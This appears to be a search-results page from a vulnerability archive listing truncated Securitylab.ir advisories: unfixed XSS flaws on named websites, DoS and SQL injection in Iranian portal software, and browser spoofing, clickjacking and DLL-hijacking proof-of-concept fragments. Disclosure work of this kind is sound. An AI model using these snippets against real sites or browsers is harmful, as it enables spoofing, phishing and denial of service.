243 matches found
Unfixed XSS vulnerability at s2.asmandez.ir
Security researcher Securitylab.ir, has submitted on 16/02/2011 a cross-site-scripting XSS vulnerability affecting s2.asmandez.ir, which at the time of submission ranked 66039 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 11/12/2011. It is...
Asan Portal (IdehPardaz) Multiple Vulnerabilities
Securitylab.ir Application Info: Name: Asan Portal Vendor: http://iptech.ir/default.aspx?id=130 Vulnerability: Denial of Service: http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&FieldName=ContentImage1&w=1000&h=1000 With setting of large values of width and height it's...
Sigma Portal Denial Of Service
Securitylab.ir Application Info: Name: Sigma Portal Vendor: http://www.sigma.ir Vulnerability Info: Type: Denial of Service Risk: Medium 2010-08-11 - Vendor notified Vulnerability: http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=Pictu...
Asan Portal SQL Injection
Securitylab.ir Application Info: Name: Asan Portal Vendor: http://iptech.ir/default.aspx?id=130 Vulnerability: Denial of Service: http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&FieldName=ContentImage1&w=1000&h=1000 With setting of large values of width and height it's...
Unfixed XSS vulnerability at srco.ir
Security researcher Securitylab.ir, has submitted on 21/12/2010 a cross-site-scripting XSS vulnerability affecting srco.ir, which at the time of submission ranked 249941 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currentl...
Unfixed XSS vulnerability at iritn.com
Security researcher Securitylab.ir, has submitted on 21/12/2010 a cross-site-scripting XSS vulnerability affecting iritn.com, which at the time of submission ranked 165855 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 11/12/2011. It is...
Unfixed XSS vulnerability at www.highportal.net
Security researcher Securitylab.ir, has submitted on 20/12/2010 a cross-site-scripting XSS vulnerability affecting www.highportal.net, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 13/01/2012. It is...
Unfixed Frame Redirect vulnerability at www.tavanir.org.ir
Security researcher Securitylab.ir, has submitted on 29/11/2010 a Frame Redirect vulnerability affecting www.tavanir.org.ir, which at the time of submission ranked 92039 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 21/12/2011. It is currentl...
Unfixed XSS vulnerability at wasc.ir
Security researcher Securitylab.ir, has submitted on 17/11/2010 a cross-site-scripting XSS vulnerability affecting wasc.ir, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 28/12/2011. It is currently...
Unfixed XSS vulnerability at members.parsdata.com
Security researcher Securitylab.ir, has submitted on 13/11/2010 a cross-site-scripting XSS vulnerability affecting members.parsdata.com, which at the time of submission ranked 96332 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 13/01/2012. It...
Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability
Proof Of Concept: 1.html: body bodyDOM: Cross Domain Vulnerability 2.html: style @import url"1.html"; /style script setTimeoutfunction var s = document.body.currentStyle.DOM; alerts; ,0; /script Vulnerable: Opera 10.62 By: Securitylab.ir Original Advisory: http://Securitylab.ir/Advisories...
Netscape 9.0.0.6 Cross Domain
PoC: 1.html: bodyDOM: Cross Domain Vulnerability 2.html: @import url"1.html"; setTimeoutfunction var s = document.body.currentStyle.DOM; alerts; ,0; Vulnerable: Netscape v9.0.0.6 By: Securitylab.ir Original Advisory: http://Securitylab.ir/Advisories...
Flash Player 9 DLL Hijacking Exploit (schannel.dll)
======================================================= Flash player 9.exe DLL Hijacking Exploit schannel.dll ======================================================= Founded By: Securitylab.ir Kamran Safaei Tabrizi ======================================================= include "stdafx.h" void in...
Flash Player 9 DLL Hijacking Exploit
======================================================= Flash player 9.exe DLL Hijacking Exploit schannel.dll ======================================================= Founded By: Securitylab.ir Kamran Safaei Tabrizi ======================================================= include "stdafx.h" void in...
Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability
Spoof Code: script language="javascript" function pausepd date = new Date; var curDate = null; do var curDate = new Date; whilecurDate-date pd; function Spoofing win = window.open'http://www.google.com','new' pause 3000 win = window.open'http://www.Securitylab.ir','new' /script a href="javascript...
Internet Explorer Address Bar Spoofing Vulnerability
.. IE8/7/6 Waiting for patch script function Spoof pd=window.open'http://www.yahoo.com', '','location=1'; pd.location.replace'http://www.microsoft.com/'; /script p align="center" bfont face="Calibri"Internet Explorer Address Bar Spoofing Vulnerability IE8,IE7,IE6/font/b/p p align="center" /p p...
SeaMonkey 2.0.5 Address Bar Spoofing Vulnerability
Spoof Code: script language="javascript" function pausepd date = new Date; var curDate = null; do var curDate = new Date; whilecurDate-date pd; function Spoofing win = window.open'http://www.google.com','new' pause 13000 win = window.open'http://www.Securitylab.ir','new' /script a href="javascrip...
Clickjacking Web Browser Multiple Vulnerability (FF3.6.7/SM 2.0.6)
Exploit for windows platform in category remote exploits ================================================================== Clickjacking Web Browser Multiple Vulnerability FF3.6.7/SM 2.0.6 ================================================================== FF3.6.7/SM 2.0.6 ClickJacking Vulnerabili...
Multiple Browsers (FF3.6.7/SM 2.0.6) - Clickjacking
FF3.6.7/SM 2.0.6 ClickJacking Vulnerability function clickjackarmorevt clickjackmouseX=evt.pageX?evt.pageX:evt.clientX; clickjackmouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById'mydiv'.style.left=clickjackmouseX-1; document.getElementById'mydiv'.style.top=clickjackmouseY-1; Firefox...
Avant Browser 11.7 Build 45 Clickjack
Avant Browser V11.7 build 45 Clickjacking ClickJacking function updateboxevt mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById'open'.style.left=mouseX-2; document.getElementById'open'.style.top=mouseY-2; Go to the google.com ClickJacking/...